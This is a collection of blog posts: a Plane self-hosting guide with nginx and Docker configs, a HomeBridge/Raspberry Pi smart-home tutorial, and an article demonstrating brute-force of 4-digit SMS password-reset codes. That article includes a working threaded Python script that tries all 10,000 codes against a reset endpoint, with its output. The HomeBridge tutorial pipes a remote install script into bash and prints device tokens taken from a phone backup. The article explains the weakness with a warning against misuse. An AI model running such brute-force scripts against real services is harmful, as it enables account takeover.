AWS_ACCESS_KEY_ID=access-key
AWS_SECRET_ACCESS_KEY=secret-key
AWS_S3_ENDPOINT_URL=http://plane-minio:9000
AWS_S3_BUCKET_NAME=uploads
MINIO_ROOT_USER=access-key
MINIO_ROOT_PASSWORD=secret-key
BUCKET_NAME=uploads
FILE_SIZE_LIMIT=5242880

# Gunicorn Workers
GUNICORN_WORKERS=1

# UNCOMMENT `DOCKER_PLATFORM` IF YOU ARE ON `ARM64` AND DOCKER IMAGE IS NOT AVAILABLE FOR RESPECTIVE `APP_RELEASE`
# DOCKER_PLATFORM=linux/amd64
Using plane.zhgchg.li as an example; NGINX_PORT is changed to 8081 to free up the original port 80 for the reverse proxy Nginx.
Under webServices/, create a docker-compose.yml file to place Nginx:
version: '3.8'
+
+services:
+ webServices-nginx:
+ image: nginx
+ restart: unless-stopped
+ volumes:
+ - ./nginx/conf.d/plane.zhgchg.li.conf:/etc/nginx/conf.d/plane.zhgchg.li.conf
+
+ ports:
+ - 80:80
+ - 443:443
+
+ networks:
+ - plane-app_default # Network used by plane
+networks:
+ plane-app_default:
+ external: true
+
Under webServices/, create a /conf.d directory & a plane.zhgchg.li.conf file:
# For plane.zhgchg.li
+
+# http example:
+server {
+ listen 80;
+ server_name plane.zhgchg.li;
+
+ client_max_body_size 0;
+
+ location / {
+ proxy_pass http://plane-app-proxy-1; # plane proxy-1 service name
+ proxy_set_header Host $host;
+ proxy_set_header X-Real-IP $remote_addr;
+ proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+ proxy_set_header X-Forwarded-Proto $scheme;
+ }
+}
+
+
+# https & http example:
+# server {
+# listen 443 ssl;
+# server_name plane.zhgchg.li;
+
+# #ssl
+# ssl_certificate /etc/nginx/conf/ssl/zhgchgli.crt; # Replace with your domain's crt & remember to add the key to docker-compose.yml volumes and mount into Docker
+# ssl_certificate_key /etc/nginx/conf/ssl/zhgchgli.key; # Replace with your domain's key & remember to add the key to docker-compose.yml volumes and mount into Docker
+# ssl_prefer_server_ciphers on;
+# ssl_protocols TLSv1.1 TLSv1.2;
+# ssl_ciphers "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA+RC4 EECDH EDH+aRSA RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS !RC4";
+# ssl_ecdh_curve secp384r1; # Requires nginx >= 1.1.0
+# ssl_session_timeout 10m;
+# ssl_session_cache shared:SSL:10m;
+# add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload";
+
+# client_max_body_size 0;
+
+# location / {
+# proxy_pass http://plane-app-proxy-1; # plane proxy-1 service name
+# proxy_set_header Host $host;
+# proxy_set_header X-Real-IP $remote_addr;
+# proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+# proxy_set_header X-Forwarded-Proto $scheme;
+# }
+# }
+
+# server {
+# listen 80;
+# server_name plane.zhgchg.li;
+# return 301 https://plane.zhgchg.li$request_uri;
+# }
+
Because there are multiple docker-compose.yml files that need to be started individually, followed by starting the Nginx reverse proxy, we can put all the startup scripts into a single Shell Script.
Create the /start.sh
file under webServices/
:
#!/bin/sh
+
+# Encapsulate the startup Script
+
+# Start Plane and other services first
+docker compose -f ./plane-selfhost/plane-app/docker-compose.yaml --env-file ./plane-selfhost/plane-app/.env up -d
+
+# Start Nginx last
+docker compose -f ./docker-compose.yml --env-file ./.env up -d
+
When creating the Script file for the first time, remember to: chmod +x ./start.sh
You can also create one to stop the services, create the /stop.sh
file under webServices/
:
#!/bin/sh
+
+# Encapsulate the stop Script
+
+docker compose -f ./plane-selfhost/plane-app/docker-compose.yaml --env-file ./plane-selfhost/plane-app/.env down
+
+docker compose -f ./docker-compose.yml --env-file ./.env down
+
When creating the Script file for the first time, remember to: chmod +x ./stop.sh
Run ./start.sh to start all services:
./start.sh
+
If hosted on an internal network, you need to ask the IT department to add a DNS record for plane.zhgchg.li -> server IP address in the internal DNS.
plane.zhgchg.li server IP address
+
If you are testing on your local computer, you can add the following to the /private/etc/hosts file:
127.0.0.1 plane.zhgchg.li
+
If it does not work, check whether the proxy_pass target http://plane-app-proxy-1 is correct and whether the Nginx docker-compose.yml network settings are correct; also check whether the welcome to nginx! default page appears (meaning the conf did not take effect). Note that once the reverse proxy is in place, you will no longer be able to access Plane using the original IP:80 method; you need to use the URL.
Since the Plane project is under development and is an open-source project, it is uncertain whether there are any serious system vulnerabilities that could become an entry point for intrusion. Therefore, it is not recommended to expose a self-hosted Plane.so on a public network. It is better to add an extra layer of security verification (a Tunnel, certificate, or VPN) to access it; even when it is set up on an internal network, it is best to isolate it.
As a project under development, there are inevitably bugs, user-experience issues, and security issues. Please be patient with the Plane.so team. If you have any issues, feel free to report them below:
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Demonstrating the severity of brute force attacks using Python
Photo by Matt Artz
This article doesn’t contain much technical content in terms of information security. It was simply a sudden idea I had while using a certain platform’s website; I decided to test its security and discovered some issues.
When using the password recovery feature on websites or apps, there are generally two options. One is to enter your account or email, and then a link to a password reset page containing a token will be sent to your email. Clicking the link will open the page where you can reset your password. This part is generally secure unless, as mentioned in this previous article, there are design flaws.
The other method for password recovery is to enter the bound phone number (mostly used in app services), and then an SMS verification code will be sent to your phone. After entering the verification code, you can reset your password. For convenience, most services use purely numeric codes. Additionally, since iOS ≥ 11 introduced the Password AutoFill feature, the keyboard will automatically recognize and prompt the verification code when the phone receives it.
According to the official documentation, Apple has not provided specific rules for the format of automatically filled verification codes. However, I noticed that almost all services supporting auto-fill use purely numeric codes, suggesting that only numbers can be used, not a complex combination of numbers and letters.
Numeric passwords are susceptible to brute force attacks, especially 4-digit passwords. There are only 10,000 combinations from 0000 to 9999. Using multiple threads and machines, brute force attacks can be divided and executed.
Assuming a verification request takes 0.1 seconds to respond, 10,000 combinations = 10,000 requests
Time required to crack: ((10,000 * 0.1) / number of threads) seconds
+
Even without using threads, it would take just over 16 minutes to find the correct SMS verification code.
In addition to insufficient password length and complexity, other issues include the lack of a limit on verification attempts and excessively long validity periods.
Combining the above points, this security issue is common in app environments. Web services often add CAPTCHA verification after multiple failed attempts or require additional security questions when requesting a password reset, increasing the difficulty of sending verification requests. Additionally, if web service verification is not separated between the front and back ends, each verification request would require loading the entire webpage, extending the response time.
In app environments, the password reset process is often simplified for user convenience. Some apps even allow login through phone number verification alone. If the API lacks protection, it can lead to security vulnerabilities.
⚠️Warning⚠️ This article is only intended to demonstrate the severity of this security issue. Do not use this information for malicious purposes.
Everything starts with sniffing. For this part, you can refer to previous articles “ The app uses HTTPS, but data is still stolen. “ and “ Using Python+Google Cloud Platform+Line Bot to automate routine tasks “. For the principles, refer to the first article, and for practical implementation, it is recommended to use Proxyman as mentioned in the second article.
If it is a front-end and back-end separated website service, you can use Chrome -> Inspect -> Network -> See what request was sent after submitting the verification code.
Assuming the verification code request obtained is:
POST https://zhgchg.li/findPWD
+
Response:
{
+ "status": false,
+ "msg": "Verification error"
+}
+
crack.py:
import random
+import requests
+import json
+import threading
+
+phone = "0911111111"
+found = False
+def crack(start, end):
+ global found
+ for code in range(start, end):
+ if found:
+ break
+
+ stringCode = str(code).zfill(4)
+ data = {
+ "phone" : phone,
+ "code": stringCode
+ }
+
+ headers = {}
+ try:
+ request = requests.post('https://zhgchg.li/findPWD', data = data, headers = headers)
+ result = json.loads(request.content)
+ if result["status"] == True:
+ print("Code is:" + stringCode)
+ found = True
+ break
+ else:
+ print("Code " + stringCode + " is wrong.")
+ except Exception as e:
+ print("Code "+ stringCode +" exception error (" + str(e) + ")")
+
+def main():
+ codeGroups = [
+ [0,1000],[1000,2000],[2000,3000],[3000,4000],[4000,5000],
+ [5000,6000],[6000,7000],[7000,8000],[8000,9000],[9000,10000]
+ ]
+ for codeGroup in codeGroups:
+ t = threading.Thread(target = crack, args = (codeGroup[0],codeGroup[1],))
+ t.start()
+
+main()
+
After running the script, we get:
Verification code is: 1743
+
Enter 1743
to reset the password or directly log in to the account.
Bigo!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Demonstrating the use of Raspberry Pi as a HomeBridge host to connect all Mi Home appliances to HomeKit
photo by picjumbo.com
Due to the pandemic, the time spent at home has increased; especially when working from home, it’s best if all home appliances can be smartly controlled via an app. This way, you don’t have to keep getting up to turn on the lights or the rice cooker, which wastes a lot of time.
Previously, I wrote an article titled “First Experience with Smart Home — Apple HomeKit & Xiaomi Mi Home”, where I initially tried using HomeBridge to connect Xiaomi appliances to HomeKit. Theoretically, it was feasible, but there wasn’t much practical application mentioned. Today’s article is a comprehensive advanced version of the previous one, including how to set up a Raspberry Pi as the host, with a step-by-step tutorial.
The motivation came from recently switching to an iPhone 11 Pro, which supports iOS ≥ 13 shortcuts with NFC automation. This means the phone can execute corresponding shortcuts when it detects an NFC tag. Although you can directly use an old EasyCard as an NFC tag, it takes up too much space and there aren’t that many cards. I asked around Guanghua Digital Plaza but couldn’t find any NFC tag stickers, so I finally found them on Shopee for $50 each and bought 5 to play with. The seller was kind enough to help me differentiate them by color.
*NFC automation is model-specific, only iPhone XS/XS max/XR/11/11pro/11pro max support this feature. Previously, with an iPhone 8, there was no NFC option.
After playing around a bit, I found a problem: when executing shortcuts for the Mi Home app, you must enable the “Show When Run” option (otherwise it won’t actually execute). When detecting the tag, you need to unlock the iPhone and the shortcut will open, making it impossible to execute directly in the background. Additionally, if the shortcut is for native Apple services (e.g., HomeKit appliances), it can execute directly in the background without unlocking. Moreover, HomeKit’s response speed and stability are much better than Mi Home’s.
This makes a big difference in user experience, so I delved deeper into connecting all Mi Home smart home products to HomeKit. For those that support HomeKit, just bind them directly; for those that don’t, follow this tutorial to bind them as well!
I made a simple reference diagram. If the smart appliance supports HomeKit, connect it directly. For those that don’t support HomeKit, set up a “HomeBridge” service host (which needs to be always on) to bridge and connect them. In the same network environment (e.g., the same WiFi), the iPhone can freely control all HomeKit appliances. However, if you’re on an external network, such as 4G mobile network, you need an Apple TV/HomePod or iPad as the home hub, always on standby at home to control HomeKit from outside. Without a home hub, the Home app will show “ No Response “ when opened from outside.
*If it’s a Xiaomi device, it will be controlled via the Xiaomi server, which means there could be security issues as the data has to go through mainland China.
So, there are two devices that need to be on standby all the time: one is an Apple TV/HomePod or iPad acting as the home hub; there is currently no workaround for this part, so you have to obtain one of these devices somehow; otherwise, you can only use HomeKit at home.
The other device can be any computer that can be on standby 24 hours (like your iMac/MacBook), an idle host (old iMac, Mac Mini), or a Raspberry Pi.
*Windows series has not been tried, but it should work too!
Alternatively, if you just want to play around, you can use your current computer (can be used together with the previous article).
This article will demonstrate using a Raspberry Pi (Raspberry Pi 3B) and a MacBook Pro (MacOS 10.15.4), starting from setting up the Raspberry Pi environment from scratch; if you are not using a Raspberry Pi, you can skip directly to the HomeBridge integration with HomeKit part (this part is the same).
Raspberry Pi 3B (special thanks to Lu Xun Huang )
If you are using a Raspberry Pi, you will also need a micro SD card (not too big, I use 8G), a card reader, a network cable (for setup, can connect to WiFi later); and the software needed for the Raspberry Pi:
After downloading the two required software, first insert the memory card into the card reader and plug it into the computer; open the Etcher program (balenaEtcher).
First, select the Raspberry Pi OS you just downloaded “xxxx.img”, second, select your memory card device, then click “Flash!” to start burning!
At this point, it will prompt you to enter the MacOS password, enter it and click “Ok” to continue.
Burning… please wait…
Verifying… please wait…
Burn successful!
*If a red Error appears, try formatting the memory card and burning it again.
Reconnect the card reader to the computer, and create an empty “ssh” file in the memory card directory ( or click here to download ) with no content and no extension, just a “ssh” file; this allows us to connect to the Raspberry Pi using Terminal.
ssh
Eject the memory card, insert it into the Raspberry Pi, connect the network cable, and power it on; make sure the MacBook and Raspberry Pi are on the same network.
The IP address assigned to the Raspberry Pi is: 192.168.0.110 (Please replace all IP addresses in this document with the one you found)
It is recommended to set the Raspberry Pi to a static/reserved IP, otherwise the IP address may change after rebooting and reconnecting, requiring you to check it again.
Open Terminal and enter:
ssh pi@your_raspberry_pi_IP_address
+
When prompted, enter yes
, and for the password, enter the default password: raspberry
Connection successful!
*If you encounter an error message like WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED, open /Users/xxxx/.ssh/known_hosts with a text editor and clear its contents.
1. Install vim:
sudo apt-get install vim
+
2. Resolve the following locale warnings:
perl: warning: Setting locale failed.
+perl: warning: Please check that your locale settings:
+ LANGUAGE = (unset),
+ LC_ALL = (unset),
+ LC_LANG = "zh_TW.UTF-8",
+ LANG = "zh_TW.UTF-8"
+ are supported and installed on your system.
+perl: warning: Falling back to the standard locale ("C").
+
Enter
vi .bashrc
+
Press “Enter” to proceed
Press “i
” to enter edit mode
Move to the bottom of the document and add a line “export LC_ALL=C
”
Press “Esc” and enter “:wq!
” to save and exit.
Then enter “source .bashrc
” to update.
3. Install nvm to manage nodejs/npm:
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.11/install.sh | bash
+
4. Use nvm to install the latest version of nodejs:
nvm install 12.16.2
*Here, we choose to install version “12.16.2”
5. Confirm the environment installation is complete:
Enter the following commands
npm -v
and
node -v
to confirm
No error messages!
6. Create a nodejs link
Enter the following command
which node
+
Get the path information where nodejs is located
Then enter
sudo ln -fs paste_the_path_you_found_with_which_node_here /usr/local/bin/node
+
Create the link
Setup complete!
Since we installed the version with a GUI, you could connect the Raspberry Pi directly to a keyboard and an HDMI display and use it as a regular computer; however, for convenience, we will use remote desktop to control the Raspberry Pi.
Enter:
sudo raspi-config
+
Enter the settings:
Select the fifth option “ Interfacing Options “
Select the third option “ P3 VNC “
Use “ ← “ to select “ Yes “ to enable
VNC remote desktop feature enabled successfully!
Use “ → “ to directly switch to “ Finish “ to exit the setup interface.
We want the VNC remote desktop service to be automatically enabled when the Raspberry Pi boots up.
Enter
sudo vim /etc/init.d/vncserver
+
Press “Enter” to proceed
Press “ i
“ to enter edit mode
#!/bin/sh
+### BEGIN INIT INFO
+# Provides: vncserver
+# Required-Start: $local_fs
+# Required-Stop: $local_fs
+# Default-Start: 2 3 4 5
+# Default-Stop: 0 1 6
+# Short-Description: Start/stop vncserver
+### END INIT INFO
+
+# More details see:
+# http://www.penguintutor.com/linux/vnc
+
+### Customize this entry
+# Set the USER variable to the name of the user to start vncserver under
+export USER='pi'
+### End customization required
+
+eval cd ~$USER
+
+case "$1" in
+ start)
+ su $USER -c '/usr/bin/vncserver -depth 16 -geometry 1024x768 :1'
+ echo "Starting VNC server for $USER "
+ ;;
+ stop)
+ su $USER -c '/usr/bin/vncserver -kill :1'
+ echo "vncserver stopped"
+ ;;
+ *)
+ echo "Usage: /etc/init.d/vncserver {start|stop}"
+ exit 1
+ ;;
+esac
+exit 0
+
“Command” + “C”, “Command” + “V” to copy and paste the above content, press “Esc” and enter “:wq!” to save and exit.
Then enter:
sudo chmod 755 /etc/init.d/vncserver
+
Change the file permissions.
Then enter:
sudo update-rc.d vncserver defaults
+
Add to startup items.
Finally enter:
sudo reboot
+
Restart the Raspberry Pi.
*After the restart is complete, reconnect using ssh as before.
Here we use the Chrome app “ VNC® Viewer for Google Chrome™ “. After installation and launch, enter Raspberry Pi IP address:1. Please note to add Port:1 at the end!
*I was unable to connect using Mac’s built-in VNC://, the reason is unknown.
Click “ Connect “.
Click “ OK “.
Enter the login username and password, the same as for the SSH connection: username pi, default password raspberry.
Successfully connected!
The rest is graphical interface! Very easy!
Set language, region, time zone.
Change the default Raspberry Pi password, enter the password you want to set.
Directly click “ Next “.
Set up WiFi connection, so you don’t need to plug in the cable anymore.
*But please note that the Raspberry Pi IP address may change, you need to check it again in the router
Whether to update the current operating system, if not in a hurry, select “ Next “ to update!
*The update takes about 20~30 minutes (depending on your internet speed)
After the update is complete, click “ Restart “ to restart.
Raspberry Pi environment setup complete!
Now for the main event, installing and using HomeBridge.
Use Terminal to ssh into the Raspberry Pi or directly use the Terminal in the VNC remote desktop.
Enter:
npm -g install homebridge --unsafe-perm
+
^( Do not add sudo )
Install HomeBridge
Installation complete!
For easier editing, use VNC remote desktop to connect to the Raspberry Pi (you can also use commands directly) :
Click the top left to open “ File Manager “ -> go to “ /home/pi/.homebridge “
If you don’t see the “config.json” file, right-click on the blank area “ New File “ -> enter the file name “ config.json “
Right-click on “ config.json “ and open with “ Text Editor “
Paste the following basic configuration content:
{
+ "bridge": {
+ "name": "Homebridge",
+ "username": "CC:22:3D:E3:CE:30",
+ "port": 51826,
+ "pin": "123-45-568"
+ }
+}
+
No need to make special changes to the content, just copy it directly!
Remember to save!
Done!
Enter:
homebridge start
+
^( Do not add sudo )
Enable
If you encounter an Error: Service name is already in use on the network / port is occupied error, try deleting the service, using
homebridge restart
to restart, or rebooting.
If you encounter an error like was not registered by any plugin, it means you haven’t installed the corresponding homebridge plugin.
If you change the configuration file (config.json) while starting, you need to modify it:
sudo homebridge restart
Restart HomeBridge
Press “Control” + “C” to close and exit the HomeBridge service in Terminal.
Take out your iPhone and open the “Home” app. In the upper right corner of “Home,” click “+”, select “Add Accessory,” and scan the QRCode that appears.
At this point, you should see “ Accessory Not Found “. Don’t worry! Because we haven’t added any accessories to the HomeBridge bridge yet, it’s okay, let’s continue.
You must have at least one accessory to scan and add!!! (Here, we use a camera as an example) : You must have at least one accessory to scan and add!!! (Here, we use a camera as an example) : You must have at least one accessory to scan and add!!! (Here, we use a camera as an example) :
The first time you scan and add, a warning window will appear. Just click “Force Add”!
After adding once, you don’t need to scan again for any new accessories; they will update automatically!
Like the VNC remote desktop service, we also want the HomeBridge service to be automatically enabled when the Raspberry Pi starts, otherwise, we have to manually log in and enable it every time it reboots.
Enter:
which homebridge
+
Get homebridge path information
Note down this path.
Then enter:
sudo vim /etc/init.d/homebridge
+
Press “Enter” to enter
Press “i
” to enter edit mode
#!/bin/sh
+### BEGIN INIT INFO
+# Provides:
+# Required-Start: $remote_fs $syslog
+# Required-Stop: $remote_fs $syslog
+# Default-Start: 2 3 4 5
+# Default-Stop: 0 1 6
+# Short-Description: Start daemon at boot time
+# Description: Enable service provided by daemon.
+### END INIT INFO
+
+dir="/home/pi"
+cmd="DEBUG=* paste the path you got from which homebridge here"
+user="pi"
+
+name=`basename $0`
+pid_file="/var/run/$name.pid"
+stdout_log="/var/log/$name.log"
+stderr_log="/var/log/$name.err"
+
+get_pid() {
+cat "$pid_file"
+}
+
+is_running() {
+[ -f "$pid_file" ] && ps -p `get_pid` > /dev/null 2>&1
+}
+
+case "$1" in
+start)
+if is_running; then
+echo "Already started"
+else
+echo "Starting $name"
+cd "$dir"
+if [ -z "$user" ]; then
+sudo $cmd >> "$stdout_log" 2>> "$stderr_log" &
+else
+sudo -u "$user" $cmd >> "$stdout_log" 2>> "$stderr_log" &
+fi
+echo $! > "$pid_file"
+if ! is_running; then
+echo "Unable to start, see $stdout_log and $stderr_log"
+exit 1
+fi
+fi
+;;
+stop)
+if is_running; then
+echo -n "Stopping $name.."
+kill `get_pid`
+for i in 1 2 3 4 5 6 7 8 9 10
+# for i in `seq 10`
+do
+if ! is_running; then
+break
+fi
+
+echo -n "."
+sleep 1
+done
+echo
+
+if is_running; then
+echo "Not stopped; may still be shutting down or shutdown may have failed"
+exit 1
+else
+echo "Stopped"
+if [ -f "$pid_file" ]; then
+rm "$pid_file"
+fi
+fi
+else
+echo "Not running"
+fi
+;;
+restart)
+$0 stop
+if is_running; then
+echo "Unable to stop, will not attempt to start"
+exit 1
+fi
+$0 start
+;;
+status)
+if is_running; then
+echo "Running"
+else
+echo "Stopped"
+exit 1
+fi
+;;
+*)
+echo "Usage: $0 {start|stop|restart|status}"
+exit 1
+;;
+esac
+exit 0
+
Replace:
cmd=”DEBUG=* Paste which homebridge path”
with the path information you found (without double quotes)
Press “Command” + “C”, “Command” + “V” to copy and paste the above content, press “Esc” and enter “:wq!” to save and exit.
Then enter:
sudo chmod 755 /etc/init.d/homebridge
+
Modify file permissions.
Finally enter:
sudo update-rc.d homebridge defaults
+
Add to startup items.
Done!
You can directly use
sudo /etc/init.d/homebridge start
to start thehomebridge
service.
You can also use:
tail -f /var/log/homebridge.err
to view startup error messages,tail -f /var/log/homebridge.log
to view logs.
Once Homebridge is up and running, we can start adding all Mi Home appliances to Homebridge and connect them to HomeKit!
First, we need to add all Mi Home smart appliances to the Mi Home APP to obtain the information needed to connect to HomeBridge.
After adding the smart appliances to the Mi Home APP:
Connect your iPhone to your Mac, open Finder/iTunes, and select the connected phone.
Select “Back up to this computer”, “Do not check! Encrypt local backup”, and click “Back Up Now”.
After the backup is complete, download and install the backup viewer software: iBackupViewer
Open “iBackupViewer”.
The first time you start it, you will need to go to Mac “System Preferences” - “Security & Privacy” - “Privacy” - “+” - add “iBackupViewer”.
*If you have privacy concerns, you can disable the network while using this software and remove it after use.
Open “iBackupViewer” again, and after successfully reading the backup file, click on the “just backed up phone”.
Select the “App Store” Icon.
On the left, find “Mi Home APP (MiHome.app)” -> On the right, find “numbers_mihome.sqlite” file and “select” -> Top right “Export” -> “Selected Files”.
*If there are two “numbers_mihome.sqlite” files, choose the one with the latest Created time.
Drag the exported numbers_mihome.sqlite file into this website to view the content:
You can change the query syntax to:
SELECT `ZDID`,`ZNAME`,`ZTOKEN` FROM 'ZDEVICE' LIMIT 0,30
+
Only display the field information we need (if there are specific appliance kits that require other field information, you can also add them for filtering).
ZTOKEN cannot be used directly, it needs to be converted to “Token” to be usable.
Here, we take the conversion of the camera’s ZToken to Token as an example:
First, we obtain the ZToken field content of the camera from the above list:
7f1a3541f0433b3ccda94beb856c2f5ba2b15f293ce0cc398ea08b549f9c74050143db63ee66b0cdff9f69917680151e
+
But the ZTOKEN obtained here cannot be used yet; we still need to convert it.
Open the website http://aes.online-domain-tools.com/ to perform the conversion:
「6d304e6867384b704b4f714d45314a34」 is the Token result we need!
*The method of obtaining the Token has been tried using “miio” to sniff directly, but it seems that the Mijia firmware has been updated, and this method can no longer be used to quickly and conveniently obtain the Token!
Finally, we also need to know the IP address of the device (here we take the camera as an example):
Open the Mi Home APP → Camera → Top right corner “…” → Settings → Network Information, to get the IP address!
Record the ZDID/Token/IP information for later use.
Install and configure each device individually according to the required plugins and connection information, and add them to HomeBridge.
Next, open Terminal, ssh into the Raspberry Pi, or use VNC remote desktop’s Terminal to continue the subsequent operations…
In Terminal, run the command to install the MijiaCamera homebridge plugin (without sudo):
npm install -g homebridge-mijia-camera
+
Refer to the previous tutorial on modifying the configuration file (config.json), and add the accessories section in the file:
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "accessories":[
+ {
+ "accessory":"MijiaCamera",
+ "name":"Mi Camera",
+ "ip":"",
+ "token":""
+ }
+ ]
+}
+
accessories:
Add the configuration information of the Mijia camera, with the ip field filled with the camera’s IP and the token field filled with the token taught in the previous tutorial.
Remember to save the file!
Then, follow the Homebridge section tutorial to start/restart/scan and add to Homebridge; you will be able to see the camera control items in the “Home” APP.
Controllable items: Camera on/off
In Terminal, install the homebridge-mi-fan homebridge plugin (without sudo):
npm install -g homebridge-mi-fan
+
Refer to the previous tutorial on modifying the configuration file (config.json), and add the platforms block in the file (if it already exists, add a sub-block within the block using a comma) :
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "platforms":[
+ {
+ "platform":"MiFanPlatform",
+ "deviceCfgs":[
+ {
+ "type":"MiDCVariableFrequencyFan",
+ "ip":"",
+ "token":"",
+ "fanName":"room fan",
+ "fanDisable":false,
+ "temperatureName":"room temperature",
+ "temperatureDisable":true,
+ "humidityName":"room humidity",
+ "humidityDisable":true,
+ "buzzerSwitchName":"fan buzzer switch",
+ "buzzerSwitchDisable":true,
+ "ledBulbName":"fan led switch",
+ "ledBulbDisable":true
+ }
+ ]
+ }
+ ]
+}
+
platforms:
Add the Mi Home fan configuration information: input the fan's IP in the ip field, input the token from the previous tutorial in the token field, and use the humidity/temperature options to control whether temperature and humidity information is displayed. The type must be the text corresponding to your model; four different fan models are supported:
Please input your own fan model.
Remember to save the file!
Then, as taught in the Homebridge section, start/restart/scan to add to Homebridge; you will be able to see the fan control items in the "Home" APP.
Controllable items: Fan on/off, wind speed adjustment
In Terminal, install the homebridge-xiaomi-air-purifier3 homebridge plugin (without sudo):
npm install -g homebridge-xiaomi-air-purifier3
+
Refer to the previous tutorial on modifying the configuration file (config.json), and add the accessories block in the file (if it already exists, add a sub-block within the block using a comma) :
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "accessories":[
+ {
+ "accessory":"XiaomiAirPurifier3",
+ "name":"Xiaomi Air Purifier",
+ "did":"",
+ "ip":"",
+ "token":"",
+ "pm25_breakpoints":[
+ 5,
+ 12,
+ 35,
+ 55
+ ]
+ }
+ ]
+}
+
accessories:
Add the Xiaomi Air Purifier configuration information: ip should be the air purifier's IP, token should be the token obtained as taught earlier, and did should be the ZDID obtained earlier.
Remember to save!
Then follow the Homebridge section instructions to start/restart/scan and add to Homebridge; you will be able to see the air purifier control items in the "Home" APP.
Controllable items: Air purifier switch, wind speed adjustment Viewable items: Current temperature and humidity
In Terminal, install the homebridge-yeelight-wifi homebridge plugin (without sudo):
npm install -g homebridge-yeelight-wifi
+
Refer to the previous tutorial on modifying the configuration file (config.json), and add the platforms block in the file (if it already exists, add a sub-block with a comma inside the block) :
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "platforms":[
+ {
+ "platform":"yeelight",
+ "name":"Yeelight"
+ }
+ ]
+}
+
No need to pass any special parameters! For more detailed settings, refer to the official documentation (such as brightness/color temperature…)
Remember to save!
The smart desk lamp also needs to be re-bound to the Yeelight APP, and then turn on “Local Network Control” to allow Homebridge to control it.
Search “Yeelight” in the App Store and install
After installation, open the Yeelight APP -> “Add Device” -> Find “Mi Home Desk Lamp” -> Re-pair and bind
Remember to turn on “ Local Network Control “
*If you accidentally didn’t turn it on, you can go to the “Device” page -> Select the desk lamp device -> Click the bottom right “△” Tab -> Click “Local Network Control” to enter settings -> Turn on Local Network Control
A little complaint, this is really bad, the Mi Home APP itself does not have this switch function, you must bind it to the Yeelight APP, and you cannot unbind or rebind it back to Mi Home… otherwise it will fail.
Then follow the Homebridge section instructions to start/restart/scan and add to Homebridge; you will be able to see the desk lamp control items in the "Home" APP.
Controllable items: Light switch, color temperature adjustment, brightness adjustment
My final config.json looks like this:
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "accessories":[
+ {
+ "accessory":"MijiaCamera",
+ "name":"Mi Camera",
+ "ip":"192.168.0.105",
+ "token":"6d304e6867384b704b4f714d45314a34"
+ },
+ {
+ "accessory":"XiaomiAirPurifier3",
+ "name":"Xiaomi Air Purifier",
+ "did":"270033668",
+ "ip":"192.168.0.108",
+ "token":"5c3eeb03065fd8fc6ad10cae1f7cce7c",
+ "pm25_breakpoints":[
+ 5,
+ 12,
+ 35,
+ 55
+ ]
+ }
+ ],
+ "platforms":[
+ {
+ "platform":"MiFanPlatform",
+ "deviceCfgs":[
+ {
+ "type":"MiDCVariableFrequencyFan",
+ "ip":"192.168.0.106",
+ "token":"dd1b6f582ba6ce34f959bbbc1c1ca59f",
+ "fanName":"room fan",
+ "fanDisable":false,
+ "temperatureName":"room temperature",
+ "temperatureDisable":true,
+ "humidityName":"room humidity",
+ "humidityDisable":true,
+ "buzzerSwitchName":"fan buzzer switch",
+ "buzzerSwitchDisable":true,
+ "ledBulbName":"fan led switch",
+ "ledBulbDisable":true
+ }
+ ]
+ },
+ {
+ "platform":"yeelight",
+ "name":"Yeelight"
+ }
+ ]
+}
+
For your reference!
The Mijia appliances I used are as taught above. I didn’t try the ones I don’t have. You can search on npm (homebridge-plugin XXX English name) and follow the similar logic to install and configure them!
Here are some homebridge plugins I found but haven’t tried (no guarantee they work):
Additionally, you can go to “Settings” -> “Control Center” -> “Customize” to add the “Home” app, allowing you to quickly operate HomeKit from the drop-down control center!
After connecting everything to HomeKit, the only word is “Awesome”! The response to switching is faster, the only downside is that I don’t have a home hub, so I can’t control it remotely. This concludes the advanced Homebridge tutorial, thank you for reading.
Back to the beginning of the article, after adding everything to HomeKit, we can seamlessly use the iOS ≥ 13 Shortcuts automation feature.
Do you want to study how the Homebridge plugin is made? It seems very interesting! So if there is a HomeBridge plugin that doesn’t meet your operational needs or a plugin is broken and you can’t find a replacement, just wait for me to study it!
There is another smart home platform Homeassistant that can be flashed into the Raspberry Pi for use (Note: A 2A power supply is required to start); I also installed Homeassistant to play with. It has a full GUI interface, and you can connect appliances with just a few clicks; I will study it in-depth later. It feels like another Mi Home platform, but if you have many different manufacturers’ IoT components, it is more suitable to use this.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Apple’s privacy principles and the adjustments to privacy protection features in iOS over the years
Theme by slidego
Supplementary updates on iOS 17 privacy-related adjustments from the previous presentation.
Safari will automatically remove tracking parameters from URLs (e.g., fbclid, gclid, …); for example, https://zhgchg.li/post/1?gclid=124 will become https://zhgchg.li/post/1 after clicking. Parameters such as fbxxx, gcxxx, etc. will be removed, but utm_ is retained; it is uncertain whether the official iOS 17 release or a future iOS 18 will enhance this further.
Developers need to declare their use of user privacy data, and any SDK they use must also provide its own Privacy Manifest.
*Additionally, third-party SDK Signature has been added
